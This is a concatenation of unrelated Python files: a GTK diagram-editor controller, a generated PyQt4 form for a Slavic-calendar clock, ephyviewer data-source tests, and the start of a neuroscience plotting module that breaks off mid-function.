        self.view.select_all()
    @action(name="diagram.unselect-all", shortcut="<Primary><Shift>a")
    def unselect_all(self):
        assert self.view
        self.view.unselect_all()
    @action(name="diagram.delete")
    @transactional
    def delete_selected_items(self):
        # Remove selected items: model elements are unlinked, bare canvas
        # items are just removed from the canvas.
        assert self.view
        items = self.view.selected_items
        for i in list(items):
            if isinstance(i, UML.Presentation):
                i.unlink()
            else:
                if i.canvas:
                    i.canvas.remove(i)
    @action(name="diagram.select-tool", state="toolbox-pointer")
    def select_tool(self, tool_name: str):
        # Install the chosen tool wrapped in a transactional tool chain.
        tool = TransactionalToolChain(self.event_manager)
        if self.view:
            tool.append(self.get_tool(tool_name))
            self.view.tool = tool
    @event_handler(DiagramItemPlaced)
    def _on_diagram_item_placed(self, event):
        # Optionally snap back to the pointer tool after placing an item.
        assert self.widget
        if self.properties("reset-tool-after-create", True):
            self.widget.action_group.actions.lookup_action("select-tool").activate(
                GLib.Variant.new_string("toolbox-pointer")
            )
    def set_drawing_style(self, sloppiness=0.0):
        """
        Set the drawing style for the diagram. 0.0 is straight,
        2.0 is very sloppy. If the sloppiness is set to be anything
        greater than 0.0, the FreeHandPainter instances will be used
        for both the item painter and the box painter. Otherwise, by
        default, the ItemPainter is used for the item and
        BoundingBoxPainter for the box.
        """
        assert self.view
        view = self.view
        if sloppiness:
            item_painter = FreeHandPainter(ItemPainter(), sloppiness=sloppiness)
            box_painter = FreeHandPainter(BoundingBoxPainter(), sloppiness=sloppiness)
        else:
            item_painter = ItemPainter()
            box_painter = BoundingBoxPainter()
        view.painter = (
            PainterChain()
            .append(item_painter)
            .append(HandlePainter())
            .append(FocusedItemPainter())
            .append(ToolPainter())
        )
        view.bounding_box_painter = box_painter
        view.queue_draw_refresh()
    def may_remove_from_model(self, view):
        """
        Check if there are items which will be deleted from the model
        (when their last views are deleted). If so request user
        confirmation before deletion.
        """
        assert self.view
        items = self.view.selected_items
        last_in_model = [
            i for i in items if i.subject and len(i.subject.presentation) == 1
        ]
        log.debug("Last in model: %s" % str(last_in_model))
        if last_in_model:
            return self.confirm_deletion_of_items(last_in_model)
        return True
    def confirm_deletion_of_items(self, last_in_model):
        """
        Request user confirmation on deleting the item from the model.
        """
        assert self.widget
        s = ""
        for item in last_in_model:
            s += "%s\n" % str(item)
        dialog = Gtk.MessageDialog(
            None,
            Gtk.DialogFlags.MODAL | Gtk.DialogFlags.DESTROY_WITH_PARENT,
            Gtk.MessageType.WARNING,
            Gtk.ButtonsType.YES_NO,
            "This will remove the following selected items from the model:\n%s\nAre you sure?"
            % s,
        )
        dialog.set_transient_for(self.widget.get_toplevel())
        value = dialog.run()
        dialog.destroy()
        if value == Gtk.ResponseType.YES:
            return True
        return False
    def _on_key_press_event(self, view, event):
        """
        Handle the 'Delete' key. This can not be handled directly (through
        GTK's accelerators) since otherwise this key will confuse the text
        edit stuff.
        """
        if (
            view.is_focus()
            and event.keyval in (Gdk.KEY_Delete, Gdk.KEY_BackSpace)
            and (
                event.get_state() == 0 or event.get_state() & Gdk.ModifierType.MOD2_MASK
            )
        ):
            self.delete_selected_items()
    def _on_view_selection_changed(self, view, selection_or_focus):
        # Broadcast the new focus/selection so other UI parts can follow it.
        self.event_manager.handle(
            DiagramSelectionChanged(view, view.focused_item, view.selected_items)
        )
    def _on_drag_data_received(self, view, context, x, y, data, info, time):
        """
        Handle data dropped on the canvas.
        """
        if (
            data
            and data.get_format() == 8
            and info == DiagramPage.VIEW_TARGET_TOOLBOX_ACTION
        ):
            # A toolbox button was dropped: create its item at the drop point.
            tool = self.get_tool(data.get_data().decode())
            tool.create_item((x, y))
            context.finish(True, False, time)
        elif (
            data
            and data.get_format() == 8
            and info == DiagramPage.VIEW_TARGET_ELEMENT_ID
        ):
            # A model element was dropped: create its diagram representation.
            element_id = data.get_data().decode()
            element = self.element_factory.lookup(element_id)
            assert element
            item_class = get_diagram_item(type(element))
            if item_class:
                with Transaction(self.event_manager):
                    item = self.diagram.create(item_class)
                    assert item
                    x, y = view.get_matrix_v2i(item).transform_point(x, y)
                    item.matrix.translate(x, y)
                    item.subject = element
                view.unselect_all()
                view.focused_item = item
            else:
                log.warning(
                    "No graphical representation for UML element %s"
                    % type(element).__name__
                )
            context.finish(True, False, time)
        else:
            context.finish(False, False, time)
|
<reponame>ssic7i/Slavs_time
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'C:\Users\sshejko.TIV\Dropbox\slav_time\slav_time_gui.ui'
#
# Created by: PyQt4 UI code generator 4.11.4
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
# Compatibility shims emitted by pyuic4: fall back to identity / plain
# translate() when the Qt bindings lack QString.fromUtf8 (API v2) or
# QApplication.UnicodeUTF8 (removed in later Qt versions).
try:
    _fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
    def _fromUtf8(s):
        # API v2 / Python 3: strings are already unicode.
        return s
try:
    _encoding = QtGui.QApplication.UnicodeUTF8
    def _translate(context, text, disambig):
        return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
    def _translate(context, text, disambig):
        return QtGui.QApplication.translate(context, text, disambig)
class Ui_Form(object):
    """pyuic4-generated UI class for a fixed-size 200x220 clock window.

    Auto-generated from slav_time_gui.ui — do not edit by hand; regenerate
    with pyuic4 instead (see the file header warning).
    """
    def setupUi(self, Form):
        """Build all widgets: three progress bars (hours/parts/fractions)
        with their labels, plus date/epoch information labels."""
        Form.setObjectName(_fromUtf8("Form"))
        Form.resize(200, 220)
        Form.setMinimumSize(QtCore.QSize(200, 220))
        Form.setMaximumSize(QtCore.QSize(200, 220))
        Form.setBaseSize(QtCore.QSize(200, 220))
        # Hours progress bar (16 "hours" per day: 0..15).
        self.progressBar_h = QtGui.QProgressBar(Form)
        self.progressBar_h.setGeometry(QtCore.QRect(110, 10, 118, 13))
        self.progressBar_h.setMaximum(15)
        self.progressBar_h.setProperty("value", 0)
        self.progressBar_h.setFormat(_fromUtf8(""))
        self.progressBar_h.setObjectName(_fromUtf8("progressBar_h"))
        self.label = QtGui.QLabel(Form)
        self.label.setGeometry(QtCore.QRect(10, 10, 46, 13))
        self.label.setObjectName(_fromUtf8("label"))
        self.label_2 = QtGui.QLabel(Form)
        self.label_2.setGeometry(QtCore.QRect(10, 30, 46, 13))
        self.label_2.setObjectName(_fromUtf8("label_2"))
        self.label_3 = QtGui.QLabel(Form)
        self.label_3.setGeometry(QtCore.QRect(10, 50, 46, 13))
        self.label_3.setObjectName(_fromUtf8("label_3"))
        self.label_h = QtGui.QLabel(Form)
        self.label_h.setGeometry(QtCore.QRect(60, 10, 46, 13))
        font = QtGui.QFont()
        font.setKerning(True)
        self.label_h.setFont(font)
        self.label_h.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
        self.label_h.setObjectName(_fromUtf8("label_h"))
        self.label_c = QtGui.QLabel(Form)
        self.label_c.setGeometry(QtCore.QRect(60, 30, 46, 13))
        self.label_c.setObjectName(_fromUtf8("label_c"))
        self.label_d = QtGui.QLabel(Form)
        self.label_d.setGeometry(QtCore.QRect(60, 50, 46, 13))
        self.label_d.setObjectName(_fromUtf8("label_d"))
        # "Parts" progress bar (0..143).
        self.progressBar_c = QtGui.QProgressBar(Form)
        self.progressBar_c.setGeometry(QtCore.QRect(110, 30, 118, 13))
        self.progressBar_c.setMaximum(143)
        self.progressBar_c.setProperty("value", 0)
        self.progressBar_c.setFormat(_fromUtf8(""))
        self.progressBar_c.setObjectName(_fromUtf8("progressBar_c"))
        # "Fractions" progress bar (0..1295).
        self.progressBar_d = QtGui.QProgressBar(Form)
        self.progressBar_d.setGeometry(QtCore.QRect(110, 50, 118, 13))
        self.progressBar_d.setMaximum(1296)
        self.progressBar_d.setProperty("value", 0)
        self.progressBar_d.setFormat(_fromUtf8(""))
        self.progressBar_d.setObjectName(_fromUtf8("progressBar_d"))
        self.label_cur_time = QtGui.QLabel(Form)
        self.label_cur_time.setGeometry(QtCore.QRect(10, 200, 201, 16))
        self.label_cur_time.setObjectName(_fromUtf8("label_cur_time"))
        self.label_hour_name = QtGui.QLabel(Form)
        self.label_hour_name.setGeometry(QtCore.QRect(10, 70, 181, 16))
        self.label_hour_name.setLocale(QtCore.QLocale(QtCore.QLocale.English, QtCore.QLocale.UnitedStates))
        self.label_hour_name.setFrameShape(QtGui.QFrame.NoFrame)
        self.label_hour_name.setObjectName(_fromUtf8("label_hour_name"))
        self.label_hour_descr = QtGui.QLabel(Form)
        self.label_hour_descr.setGeometry(QtCore.QRect(10, 90, 181, 16))
        self.label_hour_descr.setLocale(QtCore.QLocale(QtCore.QLocale.English, QtCore.QLocale.UnitedStates))
        self.label_hour_descr.setObjectName(_fromUtf8("label_hour_descr"))
        self.label_hour_descr_2 = QtGui.QLabel(Form)
        self.label_hour_descr_2.setGeometry(QtCore.QRect(10, 110, 101, 16))
        self.label_hour_descr_2.setLocale(QtCore.QLocale(QtCore.QLocale.English, QtCore.QLocale.UnitedStates))
        self.label_hour_descr_2.setObjectName(_fromUtf8("label_hour_descr_2"))
        self.label_hour_descr_3 = QtGui.QLabel(Form)
        self.label_hour_descr_3.setGeometry(QtCore.QRect(10, 127, 111, 16))
        self.label_hour_descr_3.setLocale(QtCore.QLocale(QtCore.QLocale.English, QtCore.QLocale.UnitedStates))
        self.label_hour_descr_3.setObjectName(_fromUtf8("label_hour_descr_3"))
        self.label_hour_descr_4 = QtGui.QLabel(Form)
        self.label_hour_descr_4.setGeometry(QtCore.QRect(10, 177, 111, 16))
        self.label_hour_descr_4.setLocale(QtCore.QLocale(QtCore.QLocale.English, QtCore.QLocale.UnitedStates))
        self.label_hour_descr_4.setObjectName(_fromUtf8("label_hour_descr_4"))
        self.label_round_years = QtGui.QLabel(Form)
        self.label_round_years.setGeometry(QtCore.QRect(120, 110, 46, 16))
        self.label_round_years.setObjectName(_fromUtf8("label_round_years"))
        self.label_round_life = QtGui.QLabel(Form)
        self.label_round_life.setGeometry(QtCore.QRect(120, 127, 46, 16))
        self.label_round_life.setObjectName(_fromUtf8("label_round_life"))
        self.label_cpsc = QtGui.QLabel(Form)
        self.label_cpsc.setGeometry(QtCore.QRect(120, 177, 46, 16))
        self.label_cpsc.setObjectName(_fromUtf8("label_cpsc"))
        self.label_4 = QtGui.QLabel(Form)
        self.label_4.setGeometry(QtCore.QRect(10, 145, 31, 16))
        self.label_4.setObjectName(_fromUtf8("label_4"))
        self.label_month = QtGui.QLabel(Form)
        self.label_month.setGeometry(QtCore.QRect(50, 145, 61, 16))
        self.label_month.setObjectName(_fromUtf8("label_month"))
        self.label_5 = QtGui.QLabel(Form)
        self.label_5.setGeometry(QtCore.QRect(120, 145, 31, 16))
        self.label_5.setObjectName(_fromUtf8("label_5"))
        self.label_date = QtGui.QLabel(Form)
        self.label_date.setGeometry(QtCore.QRect(160, 145, 31, 16))
        self.label_date.setObjectName(_fromUtf8("label_date"))
        self.label_6 = QtGui.QLabel(Form)
        self.label_6.setGeometry(QtCore.QRect(10, 162, 46, 13))
        self.label_6.setObjectName(_fromUtf8("label_6"))
        self.label_day_name = QtGui.QLabel(Form)
        self.label_day_name.setGeometry(QtCore.QRect(50, 162, 111, 16))
        self.label_day_name.setObjectName(_fromUtf8("label_day_name"))
        self.retranslateUi(Form)
        QtCore.QMetaObject.connectSlotsByName(Form)
    def retranslateUi(self, Form):
        """Install the (Russian) display texts; placeholder values are "0"."""
        Form.setWindowTitle(_translate("Form", "Time", None))
        self.label.setText(_translate("Form", "Часов", None))
        self.label_2.setText(_translate("Form", "Частей", None))
        self.label_3.setText(_translate("Form", "Долей", None))
        self.label_h.setText(_translate("Form", "0", None))
        self.label_c.setText(_translate("Form", "0", None))
        self.label_d.setText(_translate("Form", "0", None))
        self.label_cur_time.setText(_translate("Form", "0", None))
        self.label_hour_name.setText(_translate("Form", "0", None))
        self.label_hour_descr.setText(_translate("Form", "0", None))
        self.label_hour_descr_2.setText(_translate("Form", "Лето в круге лет", None))
        self.label_hour_descr_3.setText(_translate("Form", "Лето в круге жизни", None))
        self.label_hour_descr_4.setText(_translate("Form", "Лето С.М.З.Х", None))
        self.label_round_years.setText(_translate("Form", "0", None))
        self.label_round_life.setText(_translate("Form", "0", None))
        self.label_cpsc.setText(_translate("Form", "0", None))
        self.label_4.setText(_translate("Form", "Месяц", None))
        self.label_month.setText(_translate("Form", "0", None))
        self.label_5.setText(_translate("Form", "Число", None))
        self.label_date.setText(_translate("Form", "0", None))
        self.label_6.setText(_translate("Form", "День", None))
        self.label_day_name.setText(_translate("Form", "-", None))
|
<gh_stars>0
import ephyviewer
import numpy as np
import os
from ephyviewer.tests.testing_tools import make_video_file
def test_InMemoryAnalogSignalSource():
    """An in-memory analog source exposes channel count, shape and chunks."""
    fs = 10000.
    start = 0.
    sigs = np.random.randn(1000000, 16)
    source = ephyviewer.InMemoryAnalogSignalSource(sigs, fs, start)
    assert source.nb_channel == 16
    assert source.get_shape() == sigs.shape
    assert np.all(source.get_chunk(i_start=50, i_stop=55) == sigs[50:55])
def test_VideoMultiFileSource():
    """A multi-video source built from one generated file spans 0..10 s."""
    import av  # required by the video backend; fails fast if missing
    filenames = ['video0.avi']
    for fname in filenames:
        if not os.path.exists(fname):
            make_video_file(fname)
    source = ephyviewer.MultiVideoFileSource(filenames, None)
    assert source.t_start == 0
    assert source.t_stop == 10.
def test_InMemoryEventSource():
    """Two event channels: bounds come from the extreme times, size per channel."""
    times_a = np.arange(0, 10., .5)
    labels_a = np.array(['Event0 num {}'.format(i) for i in range(times_a.size)], dtype='U')
    times_b = np.arange(-6, 8., 2.)
    labels_b = np.array(['Event1 num {}'.format(i) for i in range(times_b.size)], dtype='U')
    source = ephyviewer.InMemoryEventSource(all_events=[
        {'time': times_a, 'label': labels_a, 'name': 'Event0'},
        {'time': times_b, 'label': labels_b, 'name': 'Event1'},
    ])
    assert source.t_start == -6.
    assert source.t_stop == 9.5
    assert source.get_size(0) == 20
def test_InMemoryEpochSource():
    """Two epoch channels: t_stop includes the last epoch's duration."""
    times_a = np.arange(0, 10., .5)
    labels_a = np.array(['Epoch0 num {}'.format(i) for i in range(times_a.size)], dtype='U')
    epoch_a = {'time': times_a, 'duration': np.ones(times_a.shape) * .1,
               'label': labels_a, 'name': 'Epoch0'}
    times_b = np.arange(-6, 8., 2.)
    labels_b = np.array(['Epoch1 num {}'.format(i) for i in range(times_b.size)], dtype='U')
    epoch_b = {'time': times_b, 'duration': np.ones(times_b.shape) * .2,
               'label': labels_b, 'name': 'Epoch1'}
    source = ephyviewer.InMemoryEpochSource(all_epochs=[epoch_a, epoch_b])
    assert source.t_start == -6.
    assert source.t_stop == 9.6
    assert source.get_size(0) == 20
def test_spikesource():
    """Two spike trains: bounds and per-unit sizes of an in-memory source."""
    spike_times_0 = np.arange(0, 10., .5)
    spike_times_1 = np.arange(-6, 8., 2.)
    all_spikes = [
        {'time': spike_times_0, 'name': 'Unit#0'},
        {'time': spike_times_1, 'name': 'unit#1'},
    ]
    source = ephyviewer.InMemorySpikeSource(all_spikes=all_spikes)
    assert source.t_start == -6.
    assert source.t_stop == 9.5
    assert source.get_size(0) == 20
def test_neo_rawio_sources():
    """Smoke-test building ephyviewer sources from a neo TdtRawIO reader.

    Relies on a local test dataset; prints shapes/chunks rather than
    asserting exact values.
    """
    #TODO make autorun neo tdtrawio test before
    from neo.rawio.tdtrawio import TdtRawIO
    # NOTE(review): hardcoded local path — the test only works on machines
    # where this dataset has been downloaded.
    dirname = '/tmp/files_for_testing_neo/tdt/aep_05/'
    neorawio = TdtRawIO(dirname=dirname)
    neorawio.parse_header()
    print(neorawio)
    sources = ephyviewer.get_sources_from_neo_rawio(neorawio)
    #~ print(sources)
    for s in sources['signal']:
        print(s.t_start, s.nb_channel, s.sample_rate)
        print(s.get_chunk(i_start=0, i_stop=1024).shape)
    for s in sources['epoch']:
        print(s.t_start, s.nb_channel)
        #~ print(s.get_chunk(i_start=0, i_stop=1024).shape)
        print(s.get_chunk_by_time(chan=0, t_start=None, t_stop=None))
    for s in sources['spike']:
        print(s.t_start, s.nb_channel)
        print(s.get_chunk_by_time(chan=0, t_start=None, t_stop=None))
        #~ print(s.get_chunk(i_start=0, i_stop=1024).shape)
def test_neo_object_sources():
    """Smoke-test building ephyviewer sources from a generated neo Segment.

    Exercises signal/epoch/event/spike source access; output is printed,
    not asserted.
    """
    from neo.test.generate_datasets import generate_one_simple_segment
    import neo
    neo_seg = generate_one_simple_segment(supported_objects=[neo.Segment, neo.AnalogSignal, neo.Event, neo.Epoch, neo.SpikeTrain])
    sources = ephyviewer.get_sources_from_neo_segment(neo_seg)
    for s in sources['signal']:
        print(s.t_start, s.nb_channel, s.sample_rate)
        print(s.get_chunk(i_start=0, i_stop=1024).shape)
    for s in sources['epoch']:
        print(s.t_start, s.nb_channel)
        print(s.get_chunk_by_time(chan=0, t_start=0, t_stop=10.))
    for s in sources['event']:
        print(s.t_start, s.nb_channel)
        print(s.get_chunk_by_time(chan=0, t_start=0, t_stop=10.))
    for s in sources['spike']:
        print(s.t_start, s.nb_channel)
        print(s.get_chunk_by_time(chan=0, t_start=0., t_stop=10.))
        #~ print(s.get_chunk(i_start=0, i_stop=1024).shape)
if __name__=='__main__':
    # Uncomment individual tests to run them directly without a test runner.
    #~ test_InMemoryAnalogSignalSource()
    #~ test_VideoMultiFileSource()
    #~ test_InMemoryEventSource()
    #~ test_InMemoryEpochSource()
    #~ test_spikesource()
    #~ test_neo_rawio_sources()
    test_neo_object_sources()
|
<gh_stars>0
# AUTOGENERATED! DO NOT EDIT! File to edit: 04_plotting.ipynb (unless otherwise specified).
__all__ = ['DEFAULT_COLORS', 'plot_2d_sta', 'plot_cross_correlation', 'plot_2d_fit', 'plot_ds_wheel',
'plot_dark_white_response', 'plot_fl_bars', 'plot_t_sta', 'plot_chirp', 'plot_chirpam_fit',
'plot_chirp_freq_epoch_fit', 'plot_spike_template', 'plot_spike_template_MEA', 'plot_autocorrelogram',
'plot_spike_amplitudes', 'plot_cell_spatial', 'plot_calcium_trace', 'plot_stim_epochs_to_spikes',
'plot_stim_epochs_to_calcium', 'plot_stim_recap_table', 'plot_composed_A_masks', 'plot_sta_positions',
'plot_dome_flat', 'plot_dome_checker', 'configure_pyplot_recap', 'plot_recap_vivo_ephy',
'plot_recap_vivo_calcium', 'plot_recap_vitro_ephy', 'plot_recap_vivo_ephy_dome']
# Cell
import matplotlib.pyplot as plt
from matplotlib import gridspec
from matplotlib.backends.backend_pdf import PdfPages
from matplotlib.patches import Ellipse
import seaborn as sns
import pandas as pd
import numpy as np
import scipy.ndimage as ndimage
from cmath import *
from .core import *
from .processing import *
from .utils import *
from .modelling import *
from .leddome import *
DEFAULT_COLORS = plt.rcParams['axes.prop_cycle'].by_key()['color']
# Cell
def plot_2d_sta(sta, grid=None, pval=None):
    """Display STA frames as a grid of grayscale images.

    sta: a single 2D frame or a stack of frames.
    grid: optional matplotlib GridSpec; when None an 8-column grid is created
    sized to the number of frames.
    pval: optional p-value appended to the "Checkerboard" title.
    """
    sta = np.array(sta)
    if len(sta.shape) == 2:
        sta = [sta]  # promote a single frame to a one-element stack
    if grid is None:
        # fig = plt.figure(figsize=(20,4+len(sta)//8*2))
        grid = gridspec.GridSpec(len(sta)//8 + 1, 8)
        for i, frame in enumerate(sta):
            ax = plt.subplot(grid[i//8, i%8])
            ax.imshow(frame, cmap='gray',vmin=-1, vmax=1)
    else:
        # Caller-provided grid: assumes len(sta) == grid_x * grid_y.
        grid_x, grid_y = grid.get_geometry()
        for i in range(grid_x):
            for j in range(grid_y):
                ax = plt.subplot(grid[i*grid_y+j])#fig.add_subplot(grid[i])
                ax.imshow(sta[i*grid_y+j], cmap='gray',vmin=-1, vmax=1, interpolation="nearest")
                # Only the bottom row / left column keep their tick marks.
                if i!=grid_x-1:
                    ax.set_xticks([])
                if j != 0:
                    ax.set_yticks([])
                if i==0 and j==1:
                    if pval is None:
                        ax.set_title("Checkerboard")
                    else:
                        ax.set_title("Checkerboard p="+format_pval(pval))
# Cell
def plot_cross_correlation(correlation_array, threshold=.1, two_sided=True):
    """Plot the grid of pairwise cross-correlograms in *correlation_array*.

    correlation_array: array of shape (n_cell, n_cell, n_lag). Pairs whose
    correlogram range exceeds *threshold* (fraction of the global range)
    are drawn in red. When *two_sided* is True the lower triangle mirrors
    the upper one.
    """
    # Bug fix: the original referenced an undefined name `fig`; draw on the
    # current pyplot figure explicitly.
    fig = plt.gcf()
    n_cell = correlation_array.shape[0]
    _min, _max = np.min(correlation_array), np.max(correlation_array)
    thresh = (_max - _min) * threshold
    for i in range(n_cell):
        for j in range(i, n_cell):
            color = "#1f77b4"
            if np.max(correlation_array[i, j]) - np.min(correlation_array[i, j]) > thresh:
                color = "red"  # highlight strongly modulated pairs
            for k in range(2 if two_sided else 1):
                if k == 0:
                    ax = fig.add_subplot(n_cell, n_cell, i*n_cell+j+1, ylim=(_min, _max), label=str(i*n_cell+j+1))
                else:
                    # mirrored lower-triangle copy; distinct label avoids axes reuse
                    ax = fig.add_subplot(n_cell, n_cell, j*n_cell+i+1, ylim=(_min, _max), label="b"+str(i*n_cell+j+1))
                plt.plot(correlation_array[i, j], c=color)
                plt.axis('off')
                if i == 0 and k == 0:
                    ax.set_title(str(j))
                elif i == 0 and k == 1:
                    ax.set_title(str(j), pad=-50, loc="left")
                elif i == j:
                    ax.set_title(str(j), pad=-50, loc="center")
# Cell
def plot_2d_fit(sta, param_d):
    """Show an STA frame (left) next to its 2D-gaussian-sum fit (right)."""
    plt.subplot(1, 2, 1)
    plt.imshow(sta, vmin=-1, vmax=1, cmap="gray")
    plt.subplot(1, 2, 2)
    fitted = img_2d_fit(sta.shape, param_d, f=sum_of_2D_gaussian)
    plt.imshow(fitted, vmin=-1, vmax=1, cmap="gray")
# Cell
def plot_ds_wheel(ax, ds_dict, cell_idx):
    """Plot direction/orientation tuning curves of one cell on a polar-style axis.

    ds_dict maps condition names to tuples whose entries are indexed as:
    [0] spike counts per angle, [1] direction-pref complex, [3] orientation-
    pref complex, [5]/[6] direction/orientation p-values. Arrows mark the
    best (lowest 1-p) direction and orientation across conditions.
    """
    key_0 = list(ds_dict.keys())[0]
    n_angle = ds_dict[key_0][0].shape[1]
    x = np.linspace(0, (n_angle-1)/4*np.pi, num=n_angle)
    linestyle = [":", "--"]
    best_oi, best_di = None, None
    idx_best_oi, idx_best_di = 0, 0
    to_plot = []
    for j, (key, data) in enumerate(ds_dict.items()):
        spike_counts = data[0][cell_idx,:]
        dir_pref = data[1][cell_idx]
        # cmath.polar: modulus = index strength, phase = preferred angle.
        dir_mod, dir_phase = polar(dir_pref)
        dir_pval = data[5][cell_idx]
        #We could aswell use the already calculated index but polar provide us an angle that can be plotted.
        ori_pref = data[3][cell_idx]
        ori_mod, ori_phase = polar(ori_pref)
        ori_pval = data[6][cell_idx]
        if best_oi is None:
            best_oi, best_di = (ori_mod, ori_phase, ori_pval), (dir_mod, dir_phase, dir_pval)
        else:
            # NOTE(review): pvals here look like 1-p (larger = more significant),
            # given the "p"+str(round(1-dir_pval,2)) labels below — confirm.
            if best_oi[2]<ori_pval:
                best_oi=(ori_mod, ori_phase, ori_pval)
                idx_best_oi = j
            if best_di[2]<dir_pval:
                best_di=(dir_mod, dir_phase, dir_pval)
                idx_best_di = j
        to_plot.append((key, spike_counts, dir_mod, dir_pval, ori_mod, ori_pval))
    for j, (key, spike_counts, dir_mod, dir_pval, ori_mod, ori_pval) in enumerate(to_plot):
        label = key+" DI:"+str(round(dir_mod,2))+" / p"+str(round(1-dir_pval,2))
        if j==idx_best_di:
            label += " *"
        label += " OI:"+str(round(ori_mod,2))+" / p"+str(round(1-ori_pval,2))
        if j==idx_best_oi:
            label += " *"
        # Close the tuning curve by repeating the first point.
        ax.plot(np.concatenate((x, x[0:1])), np.concatenate((spike_counts, spike_counts[0:1])),
                    linestyle=linestyle[j//2], c=DEFAULT_COLORS[j%2],
                    label=label)
    x_uplim = ax.get_ylim()[1]
    ds_arrow = ax.arrow(0,x_uplim/500,best_di[1], best_di[0]*x_uplim, width=.3, head_width=x_uplim/1000000, color='tab:purple', label="Best DI")
    os_arrow = ax.arrow(0,x_uplim/500,best_oi[1], best_oi[0]*x_uplim, width=.3, head_width=x_uplim/1000000, color='tab:green', label="Best OI")
    legend_obj, legend_label = ax.get_legend_handles_labels()
    #For double legend box, need to add manually the artist for the first legend
    first_legend = ax.legend(legend_obj, legend_label, loc=(-.1,-.16))
    plt.gca().add_artist(first_legend)
    ax.legend([ds_arrow, os_arrow], ["best direction index (DI)", "best orientation index (OI)"], loc=(-.1,.95), ncol=2)
# Cell
def plot_dark_white_response(ax, spike_bins):
    """Plot dark and white responses of every cell on *ax*.

    *spike_bins* must have shape (2, n_cell, trial_len): index 0 of the
    first axis is the dark response, index 1 the white response.
    """
    n_cell = spike_bins.shape[1]
    for cell in range(n_cell):
        ax.plot(spike_bins[0, cell], label="dark", c="#000000")
        ax.plot(spike_bins[1, cell], label="white", c="#8F8F8F")
        ax.set_title('Cell '+str(cell))
        ax.legend()
# Cell
def plot_fl_bars(ax, sta, pval=None):
    """Show a flickering-bars STA on *ax*, y-labelled with negative time (s)."""
    n_frames = len(sta)
    tick_labels = np.round(-np.linspace(0, n_frames/60, n_frames)[::-1], 3)
    ax.imshow(sta, cmap='gray', vmin=-1, vmax=1, aspect="auto", interpolation="nearest")
    ax.set_yticks(np.arange(0, n_frames, 1))
    ax.set_yticklabels(tick_labels)
    title = "Flickering_bars"
    if pval is not None:
        title += " p=" + format_pval(pval)
    ax.set_title(title)
# Cell
def plot_t_sta(ax, sta, pval=None):
    """Plot a temporal STA against negative time (seconds before spike)."""
    n = len(sta)
    t = -np.linspace(0, n/60, n)[::-1]
    lines = ax.plot(t, sta, label="STA norm")
    ax.set_ylim(-1, 1)
    ax.legend()
    # Rebuild the legend explicitly from the line labels.
    ax.legend(lines, [ln.get_label() for ln in lines], loc=0)
    title = "Fullfield_flickering"
    if pval is not None:
        title += " p=" + format_pval(pval)
    ax.set_title(title)
# Cell
def plot_chirp(ax, stim_inten, spike_bins, smooth=True):
    """Plot the trial-averaged chirp response on *ax* with the stimulus strip above.

    The repeat count is recovered by autocorrelating a chunk of the stimulus;
    spike_bins is folded into (n_repeats, trial_len) and drawn with seaborn's
    bootstrap confidence band. When *smooth*, each repeat is box-filtered.
    """
    #Getting the number of repeats by convolving a part of the stimulus
    conv_res = np.convolve(stim_inten[360:600].astype(float), stim_inten.astype(float), mode="full")
    n_repeats = np.sum(conv_res.max()==conv_res)
    trace = spike_bins.reshape(n_repeats,-1)
    len_ = trace.shape[1]
    timepoints = np.linspace(0, len_/60, len_)
    repeat_dfs = []
    for i, repeat_am in enumerate(trace):
        if smooth:
            # light 3-tap boxcar to reduce bin noise
            repeat_am = np.convolve([.333]*3, repeat_am, mode="same")
        repeat_dfs.append(pd.DataFrame(list(zip(timepoints,
                                                [str(i)]*len_,
                                                repeat_am)), columns=["timepoint","repeat","signal"]))
    # Bug fix: DataFrame.append was removed in pandas 2.0; build the frame
    # once with pd.concat instead of appending row-blocks in a loop.
    df = pd.concat(repeat_dfs, ignore_index=True)
    g = sns.lineplot(x="timepoint", y="signal", data=df, ax=ax, n_boot=100) #Small n_boot to speed_up plotting
                                                                            # (default n_boot=10000)
    min_val, max_val = ax.get_ylim()
    # Reserve the top fifth of the axes for the stimulus strip.
    ax.set_ylim(min_val , (max_val-min_val)*6/5)
    ax.set(xlabel='', ylabel='')
    ax.imshow([stim_inten.reshape(n_repeats,-1)[0]], aspect='auto', cmap="gray", extent=(0,len_/60,(max_val-min_val)*6/5,max_val))
# Cell
def plot_chirpam_fit(cell_mean, fit, start=390, stop=960):
    """Plot the mean chirp-AM response with its sinexp_sigm fit over [start, stop) frames."""
    fps = 60
    plt.figure()
    full_t = np.linspace(0, len(cell_mean)/fps, len(cell_mean), endpoint=False)
    plt.plot(full_t, cell_mean)
    fit_t = np.linspace(start/fps, stop/fps, stop-start, endpoint=False)
    local_t = np.linspace(0, (stop-start)/fps, stop-start, endpoint=False)
    plt.plot(fit_t, sinexp_sigm(local_t, *fit))
def plot_chirp_freq_epoch_fit(cell_mean, fit_l, freqs=[1.875,3.75,7.5,15,30], durations=[2,2,2,1,1], start=360):
    """Overlay per-frequency-epoch sine fits on the mean chirp response.

    The first few frames of each epoch are trimmed before drawing the fitted
    sin_exponent curve; epochs whose fit is None are skipped.
    """
    frame_rate = 60
    plt.figure()
    time_axis = np.linspace(0, len(cell_mean)/frame_rate, len(cell_mean), endpoint=False)
    plt.plot(time_axis, cell_mean)
    epoch_lengths = [int(duration*freq)*int(frame_rate/freq) for duration, freq in zip(durations, freqs)]
    offset = start
    edge_trim = 10
    for epoch_len, fit in zip(epoch_lengths, fit_l):
        offset += edge_trim
        epoch_len -= edge_trim
        if fit is not None:
            t = np.linspace(0, epoch_len/frame_rate, epoch_len*4, endpoint=False)
            plt.plot(t + (offset/frame_rate), sin_exponent(t, *fit))
        offset += epoch_len
# Cell
def plot_spike_template(ax, cluster_composition, templates, shanks_idx, channel_positions):
    """Plot spike templates of a cluster on the channels of its home shank.

    The shank is the one holding the channel where the first cell's template
    peaks; every cell in *cluster_composition* is drawn in its own color at
    the geometric position of each enabled channel.
    """
    tmp = cluster_composition[0]
    n_points = 30
    # Window of samples around the template centre (10 before, rest after).
    mask_trace = np.arange(templates.shape[1]//2-10,
                           templates.shape[1]//2+(n_points-10))
    # Channel with the largest absolute template amplitude.
    template_pos = np.where(np.abs(templates[tmp])
                            == np.max(np.abs(templates[tmp])))[1][0]
    template_shank = np.where(shanks_idx==template_pos)[0][0]
    selected_channels = shanks_idx[template_shank]
